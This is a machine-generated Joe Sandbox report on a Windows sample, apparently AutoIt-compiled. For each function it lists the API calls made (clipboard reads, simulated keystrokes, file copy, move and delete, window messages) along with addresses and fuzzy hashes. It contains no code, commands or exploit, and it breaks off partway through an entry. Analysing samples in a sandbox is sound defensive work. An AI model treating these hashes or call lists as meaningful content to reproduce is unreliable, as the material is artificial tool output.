                                                                                • Instruction Fuzzy Hash: B201813140011DEECF05EFA4D8828FEBBB5EF20304F008069B562971A6EA349A49CB60
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 00742AED
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                • Opcode ID: eb37c02d813ad90aa20ba9c7917e0bb08ba6e4473b0ac6c68efe82adb945a1d3
                                                                                • Instruction ID: 173334e032a00ed31e782acf57397da4e18f17bd9d134a79e9670635036d4864
                                                                                • Opcode Fuzzy Hash: eb37c02d813ad90aa20ba9c7917e0bb08ba6e4473b0ac6c68efe82adb945a1d3
                                                                                • Instruction Fuzzy Hash: 6DF0CD71A40205EADF21AFB48C0A79F3AA5BF00320F558455FC109A192D77C8A63DB52
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,007239FE,?,00000001), ref: 00724286
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 7e21bb8fa034c6853caea7e784977e6808395ede37d22602867cc2c7a47a4e72
                                                                                • Instruction ID: ee9abc63d168c50b24d72e71a27ae90032c13cf7e04436531b5aeae3837a4b7c
                                                                                • Opcode Fuzzy Hash: 7e21bb8fa034c6853caea7e784977e6808395ede37d22602867cc2c7a47a4e72
                                                                                • Instruction Fuzzy Hash: 9BF03971505722DFCB349F66E894826BBE4FF043253248A3EF1D682610C77A9840DF50
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007240C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                • Opcode ID: 41bedcf4e5356094970666efbf356a385278e73286c56209ba03ccea85f3273f
                                                                                • Instruction ID: 530103913adb2b243732eb7d8d414d2b960ba986aeafc7b11c8b9329896f6ab3
                                                                                • Opcode Fuzzy Hash: 41bedcf4e5356094970666efbf356a385278e73286c56209ba03ccea85f3273f
                                                                                • Instruction Fuzzy Hash: A1E0CD375001245BC7119654DC46FEA77ADDFCC690F054075F905D7244DA689D818690
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __fread_nolock
                                                                                • String ID:
                                                                                • API String ID: 2638373210-0
                                                                                • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                • Instruction ID: 4bf116c9da1123e717e99b2176e2971989b8e823aac3b28c08729820f46df1cf
                                                                                • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                • Instruction Fuzzy Hash: B7E092B0204B009BDB348A24D800BE373E0EB06305F00081CF69BC7241EB6278818659
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00F05FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: 4076f7ceaeb9c62b0445caaea913b59879f51075c0d9f6ca418fd589afcf0617
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 05E0BF7498010DEFDB10DFA4D5496DD7BB4EF04301F1005A1FD05D7690DB309E649A62
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00F05FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: cdee2a6ca5ed9554d04a6ac0b809e1f9bf3455a10ea463cc0bd20029504f36ab
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: DBE0E67498010DDFDB00DFB4D54969D7BF4EF04301F100161FD01D2280D6309D609A72
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0078F87D
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0078F8DC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0078F919
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0078F940
                                                                                • SendMessageW.USER32 ref: 0078F966
                                                                                • _wcsncpy.LIBCMT ref: 0078F9D2
                                                                                • GetKeyState.USER32(00000011), ref: 0078F9F3
                                                                                • GetKeyState.USER32(00000009), ref: 0078FA00
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0078FA16
                                                                                • GetKeyState.USER32(00000010), ref: 0078FA20
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0078FA4F
                                                                                • SendMessageW.USER32 ref: 0078FA72
                                                                                • SendMessageW.USER32(?,00001030,?,0078E059), ref: 0078FB6F
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0078FB85
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0078FB96
                                                                                • SetCapture.USER32(?), ref: 0078FB9F
                                                                                • ClientToScreen.USER32(?,?), ref: 0078FC03
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0078FC0F
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0078FC29
                                                                                • ReleaseCapture.USER32 ref: 0078FC34
                                                                                • GetCursorPos.USER32(?), ref: 0078FC69
                                                                                • ScreenToClient.USER32(?,?), ref: 0078FC76
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0078FCD8
                                                                                • SendMessageW.USER32 ref: 0078FD02
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0078FD41
                                                                                • SendMessageW.USER32 ref: 0078FD6C
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0078FD84
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0078FD8F
                                                                                • GetCursorPos.USER32(?), ref: 0078FDB0
                                                                                • ScreenToClient.USER32(?,?), ref: 0078FDBD
                                                                                • GetParent.USER32(?), ref: 0078FDD9
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0078FE3F
                                                                                • SendMessageW.USER32 ref: 0078FE6F
                                                                                • ClientToScreen.USER32(?,?), ref: 0078FEC5
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0078FEF1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0078FF19
                                                                                • SendMessageW.USER32 ref: 0078FF3C
                                                                                • ClientToScreen.USER32(?,?), ref: 0078FF86
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0078FFB6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0079004B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 2516578528-4164748364
                                                                                • Opcode ID: 40b2246e4e45dc95285c0478b1c31049e4e0bef366c63662da6380f69dcacef1
                                                                                • Instruction ID: 461bd1796fcc019c73931f7dc2cf458c016554d70914e4feed81529363fa1735
                                                                                • Opcode Fuzzy Hash: 40b2246e4e45dc95285c0478b1c31049e4e0bef366c63662da6380f69dcacef1
                                                                                • Instruction Fuzzy Hash: 4132DD70644344EFDB20EF68C884BAABBA8FF49354F144629F695872B1C739EC51CB52
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0078B1CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 3850602802-328681919
                                                                                • Opcode ID: ba75cbe6ed842b2128477a385ca8c9a78cf766b9df9b35f816c7ff84835660c3
                                                                                • Instruction ID: a990741b42f194c8905e34cffbc1ecb303ea336fd988a91120affaac2f4a03fc
                                                                                • Opcode Fuzzy Hash: ba75cbe6ed842b2128477a385ca8c9a78cf766b9df9b35f816c7ff84835660c3
                                                                                • Instruction Fuzzy Hash: 5812F471940208ABEB25AF64CC4DFAE7BB8FF85310F14811AF916DB2D1DB789901CB61
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 0073EB4A
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00793AEA
                                                                                • IsIconic.USER32(000000FF), ref: 00793AF3
                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00793B00
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00793B0A
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00793B20
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00793B27
                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00793B33
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00793B44
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00793B4C
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00793B54
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00793B57
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00793B6C
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00793B77
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00793B81
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00793B86
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00793B8F
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00793B94
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00793B9E
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00793BA3
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00793BA6
                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00793BCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: ecdad7ca6efe631e0dfa6db835c7d50a780c5a87338b80fd4ce6b7ff4ea95a9f
                                                                                • Instruction ID: d9bc6c5c1c26cf3238f6927d9ccad52a427ad4c89c106b279021d325801144ba
                                                                                • Opcode Fuzzy Hash: ecdad7ca6efe631e0dfa6db835c7d50a780c5a87338b80fd4ce6b7ff4ea95a9f
                                                                                • Instruction Fuzzy Hash: B031A6B1A403187BEF305B659C49F7F7E6CEB85B50F108015FA06EA1D0D6B85D10AAB4
                                                                                APIs
                                                                                  • Part of subcall function 00766EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00765FA6,?), ref: 00766ED8
                                                                                  • Part of subcall function 00766EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00765FA6,?), ref: 00766EF1
                                                                                  • Part of subcall function 0076725E: __wsplitpath.LIBCMT ref: 0076727B
                                                                                  • Part of subcall function 0076725E: __wsplitpath.LIBCMT ref: 0076728E
                                                                                  • Part of subcall function 007672CB: GetFileAttributesW.KERNEL32(?,00766019), ref: 007672CC
                                                                                • _wcscat.LIBCMT ref: 00766149
                                                                                • _wcscat.LIBCMT ref: 00766167
                                                                                • __wsplitpath.LIBCMT ref: 0076618E
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 007661A4
                                                                                • _wcscpy.LIBCMT ref: 00766209
                                                                                • _wcscat.LIBCMT ref: 0076621C
                                                                                • _wcscat.LIBCMT ref: 0076622F
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0076625D
                                                                                • DeleteFileW.KERNEL32(?), ref: 0076626E
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00766289
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00766298
                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 007662AD
                                                                                • DeleteFileW.KERNEL32(?), ref: 007662BE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007662E1
                                                                                • FindClose.KERNEL32(00000000), ref: 007662FD
                                                                                • FindClose.KERNEL32(00000000), ref: 0076630B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                • String ID: \*.*$p1Mw`KNw
                                                                                • API String ID: 1917200108-2160596699
                                                                                • Opcode ID: 1c6bb444bc9de552092c758cd2f843e057086e4882e8b7670cc3aa3a33c9a72c
                                                                                • Instruction ID: 5a05231d8106a034fc5a376bf0fbb87ff3a5727d713b471822e8c10271171100
                                                                                • Opcode Fuzzy Hash: 1c6bb444bc9de552092c758cd2f843e057086e4882e8b7670cc3aa3a33c9a72c
                                                                                • Instruction Fuzzy Hash: 7951017290811CAACB21EB91CC59DDB77BCBF05300F4941E6E946E2141DF3A9B89CFA4
                                                                                APIs
                                                                                • OpenClipboard.USER32(007BDC00), ref: 00776B36
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00776B44
                                                                                • GetClipboardData.USER32(0000000D), ref: 00776B4C
                                                                                • CloseClipboard.USER32 ref: 00776B58
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00776B74
                                                                                • CloseClipboard.USER32 ref: 00776B7E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00776B93
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00776BA0
                                                                                • GetClipboardData.USER32(00000001), ref: 00776BA8
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00776BB5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00776BE9
                                                                                • CloseClipboard.USER32 ref: 00776CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                • Opcode ID: b3c4045c60cc7c0e3fda34e749654bc4fc21800d4312eddf3b8dd0363f077649
                                                                                • Instruction ID: 5ef4fffa9d5b717b4f09f56115ecbc1e00a03357aeae523402ff0e85e42f6808
                                                                                • Opcode Fuzzy Hash: b3c4045c60cc7c0e3fda34e749654bc4fc21800d4312eddf3b8dd0363f077649
                                                                                • Instruction Fuzzy Hash: 1451D371244201ABD711EF60DC5AFAE77A8AF95B40F108029F58BD61E1DF78EC05CB66
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0076F62B
                                                                                • FindClose.KERNEL32(00000000), ref: 0076F67F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0076F6A4
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0076F6BB
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0076F6E2
                                                                                • __swprintf.LIBCMT ref: 0076F72E
                                                                                • __swprintf.LIBCMT ref: 0076F767
                                                                                • __swprintf.LIBCMT ref: 0076F7BB
                                                                                  • Part of subcall function 0074172B: __woutput_l.LIBCMT ref: 00741784
                                                                                • __swprintf.LIBCMT ref: 0076F809
                                                                                • __swprintf.LIBCMT ref: 0076F858
                                                                                • __swprintf.LIBCMT ref: 0076F8A7
                                                                                • __swprintf.LIBCMT ref: 0076F8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 835046349-2428617273
                                                                                • Opcode ID: 8186f30c4578cb6d258a4d36b1f44b69d696db33974ce059aeffebdde9653389
                                                                                • Instruction ID: ced9600e729640ca7ab6239486f6e5cbfc083a44124ca931d1f9723a2076217a
                                                                                • Opcode Fuzzy Hash: 8186f30c4578cb6d258a4d36b1f44b69d696db33974ce059aeffebdde9653389
                                                                                • Instruction Fuzzy Hash: C5A111B2408354EBD311EB94D889DAFB7ECAF98704F44082EF585C3152EB38D949C762
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00771B50
                                                                                • _wcscmp.LIBCMT ref: 00771B65
                                                                                • _wcscmp.LIBCMT ref: 00771B7C
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00771B8E
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00771BA8
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00771BC0
                                                                                • FindClose.KERNEL32(00000000), ref: 00771BCB
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00771BE7
                                                                                • _wcscmp.LIBCMT ref: 00771C0E
                                                                                • _wcscmp.LIBCMT ref: 00771C25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00771C37
                                                                                • SetCurrentDirectoryW.KERNEL32(007D39FC), ref: 00771C55
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00771C5F
                                                                                • FindClose.KERNEL32(00000000), ref: 00771C6C
                                                                                • FindClose.KERNEL32(00000000), ref: 00771C7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 41f7d570ea425128f2706df275c4d8c6b6ac51c144df758c8f9c2554d06ad439
                                                                                • Instruction ID: 1a27a2f2a18f62c38c5bffb7487eb8c167510081020f2c99d7f39169d3dde776
                                                                                • Opcode Fuzzy Hash: 41f7d570ea425128f2706df275c4d8c6b6ac51c144df758c8f9c2554d06ad439
                                                                                • Instruction Fuzzy Hash: 8D31D872600219ABCF21ABF4DC49ADE77AC9F46354F50C156F90AD2090EB78DF458B64
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00771CAB
                                                                                • _wcscmp.LIBCMT ref: 00771CC0
                                                                                • _wcscmp.LIBCMT ref: 00771CD7
                                                                                  • Part of subcall function 00766BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00766BEF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00771D06
                                                                                • FindClose.KERNEL32(00000000), ref: 00771D11
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00771D2D
                                                                                • _wcscmp.LIBCMT ref: 00771D54
                                                                                • _wcscmp.LIBCMT ref: 00771D6B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00771D7D
                                                                                • SetCurrentDirectoryW.KERNEL32(007D39FC), ref: 00771D9B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00771DA5
                                                                                • FindClose.KERNEL32(00000000), ref: 00771DB2
                                                                                • FindClose.KERNEL32(00000000), ref: 00771DC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
